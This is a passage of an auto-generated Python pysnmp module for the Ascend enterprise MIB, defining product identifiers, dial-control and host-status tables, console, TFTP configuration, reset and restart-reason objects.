aqueduct = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 6))
stinger_10 = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 7)).setLabel("stinger-10")
apx_8000 = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 8)).setLabel("apx-8000")
max200 = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 2, 1))
max1800 = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 2, 2))
max2000 = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 2, 3))
max4000 = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 2, 4))
max4002 = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 2, 5))
max4004 = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 2, 6))
max6000 = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 2, 7))
max800 = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 2, 8))
max3000 = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 2, 9))
dslmax20 = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 2, 10))
terminator = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 2, 11))
cvmax100 = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 2, 12))
pipe15 = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 1))
pipe25 = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 2))
pipe25Px = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 3))
pipe25Fx = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 4))
pipe50 = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 5))
pipe75 = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 6))
pipe130T1 = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 7))
pipe400 = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 8))
pipe220 = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 9))
dslPipeAcap = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 10))
dslPipeS = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 11))
dslPipe2S = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 12))
dslPipeAdmt = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 21))
dslPipeAlctlDmt = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 22))
dslPipeAdslCoeC = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 13))
dslPipeSdslCoe = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 14))
dslPipeSdslCoe2S = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 15))
dslPipeAdslCoeD = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 20))
pipe85 = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 16))
pipe50LS56 = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 17))
pipe130V35 = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 18))
pipe130N56 = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 19))
spipe95 = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 23))
spipe155T1 = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 24))
dslPipe50SdslCell = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 25))
dslPipeSdslHs = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 3, 26))
aq300 = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 1, 6, 1))
hostTypeAny = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 3, 1))
hostTypeDual = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 3, 2))
hostTypeQuad = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 3, 3))
hostTypeAim2 = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 3, 4))
hostTypeAim6 = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 3, 5))
lanTypeAny = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 5, 1))
lanTypeEthernet = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 5, 2))
lanTypeEtherData = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 5, 3))
doTable = MibTable((1, 3, 6, 1, 4, 1, 529, 6, 1), )
if mibBuilder.loadTexts: doTable.setStatus('mandatory')
doEntry = MibTableRow((1, 3, 6, 1, 4, 1, 529, 6, 1, 1), ).setIndexNames((0, "ASCEND-MIB", "doSlotIndex"), (0, "ASCEND-MIB", "doItemIndex"))
if mibBuilder.loadTexts: doEntry.setStatus('mandatory')
doSlotIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 529, 6, 1, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: doSlotIndex.setStatus('mandatory')
doItemIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 529, 6, 1, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: doItemIndex.setStatus('mandatory')
doDial = MibTableColumn((1, 3, 6, 1, 4, 1, 529, 6, 1, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("valid", 1), ("notValid", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: doDial.setStatus('mandatory')
doHangUp = MibTableColumn((1, 3, 6, 1, 4, 1, 529, 6, 1, 1, 4), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("valid", 1), ("notValid", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: doHangUp.setStatus('mandatory')
doAnswer = MibTableColumn((1, 3, 6, 1, 4, 1, 529, 6, 1, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("valid", 1), ("notValid", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: doAnswer.setStatus('mandatory')
doExtendBW = MibTableColumn((1, 3, 6, 1, 4, 1, 529, 6, 1, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("valid", 1), ("notValid", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: doExtendBW.setStatus('mandatory')
doContractBW = MibTableColumn((1, 3, 6, 1, 4, 1, 529, 6, 1, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("valid", 1), ("notValid", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: doContractBW.setStatus('mandatory')
doBegEndRemoteLB = MibTableColumn((1, 3, 6, 1, 4, 1, 529, 6, 1, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("valid", 1), ("notValid", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: doBegEndRemoteLB.setStatus('mandatory')
doBegEndBERT = MibTableColumn((1, 3, 6, 1, 4, 1, 529, 6, 1, 1, 9), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("valid", 1), ("notValid", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: doBegEndBERT.setStatus('mandatory')
doResynchronize = MibTableColumn((1, 3, 6, 1, 4, 1, 529, 6, 1, 1, 10), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("valid", 1), ("notValid", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: doResynchronize.setStatus('mandatory')
hostStatusTable = MibTable((1, 3, 6, 1, 4, 1, 529, 7, 1), )
if mibBuilder.loadTexts: hostStatusTable.setStatus('mandatory')
hostStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 529, 7, 1, 1), ).setIndexNames((0, "ASCEND-MIB", "hostStatusSlotIndex"), (0, "ASCEND-MIB", "hostStatusItemIndex"))
if mibBuilder.loadTexts: hostStatusEntry.setStatus('mandatory')
hostStatusSlotIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 529, 7, 1, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hostStatusSlotIndex.setStatus('mandatory')
hostStatusItemIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 529, 7, 1, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hostStatusItemIndex.setStatus('mandatory')
hostStatusLocalName = MibTableColumn((1, 3, 6, 1, 4, 1, 529, 7, 1, 1, 3), OctetString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hostStatusLocalName.setStatus('mandatory')
hostStatusDialNum = MibTableColumn((1, 3, 6, 1, 4, 1, 529, 7, 1, 1, 4), OctetString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hostStatusDialNum.setStatus('mandatory')
hostStatusCallType = MibTableColumn((1, 3, 6, 1, 4, 1, 529, 7, 1, 1, 5), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7))).clone(namedValues=NamedValues(("aim", 1), ("bonding", 2), ("one-channel", 3), ("two-channel", 4), ("ft1", 5), ("ft1Aim", 6), ("ft1BandO", 7)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hostStatusCallType.setStatus('mandatory')
hostStatusCallMgm = MibTableColumn((1, 3, 6, 1, 4, 1, 529, 7, 1, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11))).clone(namedValues=NamedValues(("none", 1), ("manual", 2), ("static", 3), ("dynamic", 4), ("delta", 5), ("one-of-8", 6), ("one-of-40", 7), ("mode1", 8), ("mode2", 9), ("mode3", 10), ("mode0", 11)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hostStatusCallMgm.setStatus('mandatory')
hostStatusDataSvc = MibTableColumn((1, 3, 6, 1, 4, 1, 529, 7, 1, 1, 7), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57))).clone(namedValues=NamedValues(("serviceVoice", 1), ("service56KR", 2), ("service56K", 3), ("service64K", 4), ("service384KR", 5), ("service384K-H0", 6), ("service1536K", 7), ("service1536KR", 8), ("service128K", 9), ("service192K", 10), ("service256K", 11), ("service320K", 12), ("service384K", 13), ("service448K", 14), ("service512K", 15), ("service576K", 16), ("service640K", 17), ("service704K", 18), ("service768K", 19), ("service832K", 20), ("service896K", 21), ("service960K", 22), ("service1024K", 23), ("service1088K", 24), ("service1152K", 25), ("service1216K", 26), ("service1280K", 27), ("service1344K", 28), ("service1408K", 29), ("service1472K", 30), ("service1600K", 31), ("service1664K", 32), ("service1728K", 33), ("service1792K", 34), ("service1856K", 35), ("service1920K", 36), ("serviceModem", 37), ("serviceV110-24-56K", 38), ("serviceV110-48-56K", 39), ("serviceV110-96-56K", 40), ("serviceV110-192-56K", 41), ("serviceV110-384-56K", 42), ("serviceV110-24-56KR", 43), ("serviceV110-48-56KR", 44), ("serviceV110-96-56KR", 45), ("serviceV110-192-56KR", 46), ("serviceV110-384-56KR", 47), ("serviceV110-24-64K", 48), ("serviceV110-48-64K", 49), ("serviceV110-96-64K", 50), ("serviceV110-192-64K", 51), ("serviceV110-384-64K", 52), ("serviceV110-24-64KR", 53), ("serviceV110-48-64KR", 54), ("serviceV110-96-64KR", 55), ("serviceV110-192-64KR", 56), ("serviceV110-384-64KR", 57)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hostStatusDataSvc.setStatus('mandatory')
hostStatusCallState = MibTableColumn((1, 3, 6, 1, 4, 1, 529, 7, 1, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17))).clone(namedValues=NamedValues(("other", 1), ("answering", 2), ("calling", 3), ("clearing", 4), ("localLoop", 5), ("handshake", 6), ("idle", 7), ("online", 8), ("loopMast", 9), ("loopSlav", 10), ("bertMast", 11), ("bertSlav", 12), ("remoteMg", 13), ("ringing", 14), ("setupAdd", 15), ("setupHnd", 16), ("setupRem", 17)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hostStatusCallState.setStatus('mandatory')
hostStatusRemName = MibTableColumn((1, 3, 6, 1, 4, 1, 529, 7, 1, 1, 9), OctetString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hostStatusRemName.setStatus('mandatory')
hostStatusChannels = MibTableColumn((1, 3, 6, 1, 4, 1, 529, 7, 1, 1, 10), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hostStatusChannels.setStatus('mandatory')
hostStatusDuration = MibTableColumn((1, 3, 6, 1, 4, 1, 529, 7, 1, 1, 11), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hostStatusDuration.setStatus('mandatory')
consoleNumber = MibScalar((1, 3, 6, 1, 4, 1, 529, 8, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: consoleNumber.setStatus('mandatory')
consoleTable = MibTable((1, 3, 6, 1, 4, 1, 529, 8, 2), )
if mibBuilder.loadTexts: consoleTable.setStatus('mandatory')
consoleEntry = MibTableRow((1, 3, 6, 1, 4, 1, 529, 8, 2, 1), ).setIndexNames((0, "ASCEND-MIB", "consoleIndex"))
if mibBuilder.loadTexts: consoleEntry.setStatus('mandatory')
consoleIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 529, 8, 2, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: consoleIndex.setStatus('mandatory')
consoleIf = MibTableColumn((1, 3, 6, 1, 4, 1, 529, 8, 2, 1, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: consoleIf.setStatus('mandatory')
consoleType = MibTableColumn((1, 3, 6, 1, 4, 1, 529, 8, 2, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("other", 1), ("primary", 2), ("secondary", 3), ("palmtop", 4), ("inactive", 5), ("remote", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: consoleType.setStatus('mandatory')
consoleSecurity = MibTableColumn((1, 3, 6, 1, 4, 1, 529, 8, 2, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: consoleSecurity.setStatus('mandatory')
consoleSpecific = MibTableColumn((1, 3, 6, 1, 4, 1, 529, 8, 2, 1, 5), ObjectIdentifier()).setMaxAccess("readonly")
if mibBuilder.loadTexts: consoleSpecific.setStatus('mandatory')
sysAbsoluteStartupTime = MibScalar((1, 3, 6, 1, 4, 1, 529, 9, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sysAbsoluteStartupTime.setStatus('mandatory')
sysSecsSinceStartup = MibScalar((1, 3, 6, 1, 4, 1, 529, 9, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sysSecsSinceStartup.setStatus('mandatory')
sysMibVersionNum = MibScalar((1, 3, 6, 1, 4, 1, 529, 9, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sysMibVersionNum.setStatus('mandatory')
sysMibMinorRevNum = MibScalar((1, 3, 6, 1, 4, 1, 529, 9, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sysMibMinorRevNum.setStatus('mandatory')
sysConfigTftp = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 9, 5))
sysConfigTftpCmd = MibScalar((1, 3, 6, 1, 4, 1, 529, 9, 5, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8))).clone(namedValues=NamedValues(("save", 1), ("restore", 2), ("saveAll", 3), ("saveMib", 4), ("saveAllMib", 5), ("loadCode", 6), ("saveIncProf", 7), ("saveExcProf", 8)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: sysConfigTftpCmd.setStatus('mandatory')
sysConfigTftpStatus = MibScalar((1, 3, 6, 1, 4, 1, 529, 9, 5, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17))).clone(namedValues=NamedValues(("ok", 1), ("notFound", 2), ("access", 3), ("noSpace", 4), ("badOp", 5), ("badTid", 6), ("exists", 7), ("noSuchUser", 8), ("parameter", 9), ("busy", 10), ("noResources", 11), ("timeout", 12), ("unrecoverable", 13), ("tooManyRetries", 14), ("createFile", 15), ("openFile", 16), ("inProgress", 17)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: sysConfigTftpStatus.setStatus('mandatory')
sysConfigTftpHostAddr = MibScalar((1, 3, 6, 1, 4, 1, 529, 9, 5, 3), IpAddress()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: sysConfigTftpHostAddr.setStatus('mandatory')
sysConfigTftpFilename = MibScalar((1, 3, 6, 1, 4, 1, 529, 9, 5, 4), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: sysConfigTftpFilename.setStatus('mandatory')
sysConfigTftpPort = MibScalar((1, 3, 6, 1, 4, 1, 529, 9, 5, 5), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: sysConfigTftpPort.setStatus('mandatory')
sysConfigTftpParameter = MibScalar((1, 3, 6, 1, 4, 1, 529, 9, 5, 6), DisplayString()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: sysConfigTftpParameter.setStatus('mandatory')
sysConfigRadius = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 9, 6))
sysConfigRadiusCmd = MibScalar((1, 3, 6, 1, 4, 1, 529, 9, 6, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("all", 1), ("routes", 2), ("pools", 3), ("nailed", 4), ("termsrv", 5), ("source", 6)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: sysConfigRadiusCmd.setStatus('mandatory')
sysConfigRadiusStatus = MibScalar((1, 3, 6, 1, 4, 1, 529, 9, 6, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("init", 1), ("processing", 2), ("timeout", 3), ("error", 4), ("complete", 5)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: sysConfigRadiusStatus.setStatus('mandatory')
sysAbsoluteCurrentTime = MibScalar((1, 3, 6, 1, 4, 1, 529, 9, 7), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: sysAbsoluteCurrentTime.setStatus('mandatory')
sysReset = MibScalar((1, 3, 6, 1, 4, 1, 529, 9, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("no-op", 1), ("reset", 2)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: sysReset.setStatus('mandatory')
sysLoadName = MibScalar((1, 3, 6, 1, 4, 1, 529, 9, 9), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sysLoadName.setStatus('mandatory')
sysAuthPreference = MibScalar((1, 3, 6, 1, 4, 1, 529, 9, 10), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("no-op", 1), ("local-first", 2), ("remote-first", 3), ("remote-no", 4)))).setMaxAccess("readwrite")
if mibBuilder.loadTexts: sysAuthPreference.setStatus('mandatory')
sysSPROM = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 9, 11))
sysSPROMSerialNumber = MibScalar((1, 3, 6, 1, 4, 1, 529, 9, 11, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sysSPROMSerialNumber.setStatus('mandatory')
sysSPROMOptions1 = MibScalar((1, 3, 6, 1, 4, 1, 529, 9, 11, 2), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sysSPROMOptions1.setStatus('mandatory')
sysSPROMOptions2 = MibScalar((1, 3, 6, 1, 4, 1, 529, 9, 11, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sysSPROMOptions2.setStatus('mandatory')
sysSPROMCountries1 = MibScalar((1, 3, 6, 1, 4, 1, 529, 9, 11, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sysSPROMCountries1.setStatus('mandatory')
resetStat = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 9, 12))
resetStatEther = MibScalar((1, 3, 6, 1, 4, 1, 529, 9, 12, 1), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: resetStatEther.setStatus('mandatory')
resetStatWAN = MibScalar((1, 3, 6, 1, 4, 1, 529, 9, 12, 2), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: resetStatWAN.setStatus('mandatory')
resetStatAll = MibScalar((1, 3, 6, 1, 4, 1, 529, 9, 12, 3), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: resetStatAll.setStatus('mandatory')
sysLastRestartReason = MibScalar((1, 3, 6, 1, 4, 1, 529, 9, 13), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 55, 60, 61, 62, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 129, 130, 131, 135, 136, 140, 145, 146, 150, 151, 152, 153, 154, 160, 161, 165, 170, 171, 175, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 190, 191, 192, 193, 194, 195, 196, 197, 198, 200, 201, 210, 211, 220, 221, 300, 301, 302, 303, 304, 305, 306, 309, 310, 311, 312, 313, 314, 320, 321, 330, 381, 382, 383, 384, 385, 400, 550, 512, 767, 768, 800, 801, 999, 1001, 1002, 1003, 1005, 1006, 1007, 2001, 2002, 2010, 2022, 2100, 2101, 3001, 3002, 3003, 4000, 4100, 9998, 9999))).clone(namedValues=NamedValues(("fatalAssert", 1), ("fatalPoolsNoBuffer", 2), ("fatalProfileBad", 3), ("fatalSwitchTypeBad", 4), ("fatalLif", 5), ("fatalLcdError", 6), ("fatalIsacTimeout", 7), ("fatalSCCSpuriousInterrupt", 8), ("fatalExecInvalidSwitch", 9), ("fatalExecNoMailDesc", 10), ("fatalExecNoMailPoll", 11), ("fatalExecNoTask", 12), ("fatalExecNoTimer", 13), ("fataExecNoTimerPool", 14), ("fatalExecWaitInCtricalSection", 15), ("fatalDspDead", 16), ("fatalDspProtocolError", 17), ("fatalDspInternalError", 18), ("fatalDspLossOfSync", 19), ("fatalDspUnUsed", 20), ("fatalDDDDead", 21), ("fatalDDDProtocolError", 22), ("fatalX25Buffers", 23), ("fatalX25Init", 24), ("fatalX25Stack", 25), ("fatalZeroMemoryAlloc", 27), ("fatalNegativeMemoryAllocate", 28), ("fatalTaskLoop", 29), ("fatalMemcpyTooLarge", 30), ("fatalMemcpyNoMagic", 31), ("fatalMemcpyWrongMagic", 32), ("fatalMemcoyBadStart", 33), ("fatalIDECTimeout", 34), ("fatalExecRestricted", 35), ("fatalStackOverflow", 36), ("fatalDRAMCard", 37), ("fatalMbufPanic", 38), ("fatalNoPriority2Task", 39), ("fatalProtectionFault", 40), ("fatalClipping", 41), ("fatalReadyHangFault", 42), ("fatalExcessPostCompl", 43), ("fatalWriteProtect", 44), ("fatalPureVirtual", 45), ("fatalATMSVC", 46), ("fatalFRSVC", 47), ("fatalInterruptCode", 48), ("fatalLinkedListCorruption", 55), ("fatalBadPower", 60), ("fatalWatchdogTimeout", 61), ("fatalUnexplainedNMI", 62), ("fatalPrimarySelected", 98), ("fatalOperatorReset", 99), ("fatalSystemUp", 100), ("warningBufferInUse", 101), ("warningBufferWrongPool", 102), ("warningBufferWrongHeap", 103), ("warningBufferNotMemAlloc", 104), ("warningBufferBadMemAlloc", 105), ("warningBufferBogusPool", 106), ("warningBufferBogusHeap", 107), ("warningBufferNegativeMemalloc", 108), ("warningBufferZeroMemalloc", 109), ("warningBufferBoundary", 110), ("warningBufferTooBig", 111), ("warningBufferNull", 112), ("warningBufferSegmentCountZero", 113), ("warningBufferTrailerMagic", 114), ("warningBufferTrailerBuffer", 115), ("warningBufferTrailerLength", 116), ("warningBufferTrailerUserMagic", 117), ("warningBufferWriteAfterFree", 118), ("warningBufferNotInUse", 119), ("warningBufferMemcpyMagic", 120), ("warningBufferMemcpyMagicNext", 121), ("warningBufferNoExtraDRAM", 129), ("errprPPPAsuncBufferInUse", 130), ("warningIpcpIpLookup", 131), ("warningBadChunk", 135), ("warningUnexpectedIF", 136), ("warningNoTimers", 140), ("warningLCDAllocFailure", 145), ("warningLCDNonSense", 146), ("warningMemcpyTooLarge", 150), ("warningMemcpyNoMagic", 151), ("warningMemcpyWrongMagic", 152), ("warningMemcpyBadStart", 153), ("warningWANBufferLeak", 154), ("warningTermSrvState", 160), ("warningTermSrvSemaphore", 161), ("warningTelnetFreeDrv", 165), ("warningSTACTimeout", 170), ("warningSTACDataNotOwned", 171), ("warningExecFailure", 175), ("warningExecNoMailbox", 177), ("warningExecNoResources", 178), ("warningUnexpected", 179), ("warningChannelMapStuck", 180), ("warningChannelDisplayStuck", 181), ("warningNewCallNoDiscRequest", 182), ("warningNewCallNoDiscResp", 183), ("warningDisconnectRequestDropped", 184), ("warningSpyderBuffer", 185), ("warningSpyderDesc", 186), ("warningSpyderLoseChannel", 187), ("warningHscxSlowRelay", 188), ("warningTcpSbcontTooBig", 190), ("warningTcpSequenceGap", 191), ("warningTcpTooMuchData", 192), ("warningTcpTooMuchWrite", 193), ("warningTcpBadOptions", 194), ("warningLmodSlotDown", 195), ("warningLmodDspDown", 196), ("warningLmodDspmodemDown", 197), ("warningTcpXmitLooping", 198), ("warningOspfFatal", 200), ("warningOspfWarn", 201), ("warningBriJumperNotPresent", 210), ("warningBriJumperConfiguration", 211), ("infoCardBounced", 220), ("infoCardDown", 221), ("warningTacacsplusBase", 300), ("warningTacacsplusPointerInconsistency", 301), ("warningTacacsplusIndexInconsistency", 302), ("warningTacacsplusTcpInconsistency", 303), ("warningTacacsplusTcpOutofrangesocket", 304), ("warningTacacsplusSocketMismatch", 305), ("warningTacacsplusUnexpectedAuthState", 306), ("warningTacacsplusMax", 309), ("warningCidrWrongTree", 310), ("warningCidrNoMem", 311), ("warningCidrBusy", 312), ("warningCidrNonempty", 313), ("warningCidrDupDelete", 314), ("warningSauthWrongInfo", 320), ("warningSauthBadAddr", 321), ("warningGdbProtectionFault", 330), ("warningInFilterList", 381), ("warningNoCountInFilterList", 382), ("warningMismatchCountFilterList", 383), ("warningCdtUnprotectedAccess", 384), ("infoSystemResetOccurred", 385), ("warningBadPowerSupply", 400), ("warningEthernetNoTxBuf", 550), ("warningDspCrashMin", 512), ("warningDspCrashMax", 767), ("warningDspWrongSlot", 768), ("warningUnalignedAccess", 800), ("warningH323NoResources", 801), ("warningExecRestricted", 999), ("warningEthernetCuBusy", 1001), ("warningEthernetAckFailure", 1002), ("warningEthernetReset", 1003), ("warningEthernetCuActive", 1005), ("warningEthernetWaitScb", 1006), ("warningEthernetNoMACAddress", 1007), ("warningBaeepromChange", 2001), ("warningBaeepromImageMismatch", 2002), ("warningFlashTypeBad", 2010), ("warningMaxiopLoadFailure", 2022), ("warningPrimaryHWsetupFailed", 2100), ("warningSecondaryHWsetupFailed", 2101), ("warningIpxsapFilterMagic", 3001), ("warningIpxsapFilterCountZero", 3002), ("warningIpxsapFilterCountMismatch", 3003), ("warningModemTxChannelStuck", 4000), ("warningModemTxChannelRecovered", 4100), ("notApplicable", 9998), ("unknown", 9999)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: sysLastRestartReason.setStatus('mandatory')
sysConfigChange = MibScalar((1, 3, 6, 1, 4, 1, 529, 9, 14), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sysConfigChange.setStatus('mandatory')
sysConfigFlash = MibIdentifier((1, 3, 6, 1, 4, 1, 529, 9, 15))
fatalLogTable = MibTable((1, 3, 6, 1, 4, 1, 529, 9, 16), )
if mibBuilder.loadTexts: fatalLogTable.setStatus('mandatory')
fatalLogTableEntry = MibTableRow((1, 3, 6, 1, 4, 1, 529, 9, 16, 1), ).setIndexNames((0, "ASCEND-MIB", "fatalLogIndex"))
if mibBuilder.loadTexts: fatalLogTableEntry.setStatus('mandatory')
fatalLogIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 529, 9, 16, 1, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: fatalLogIndex.setStatus('mandatory')
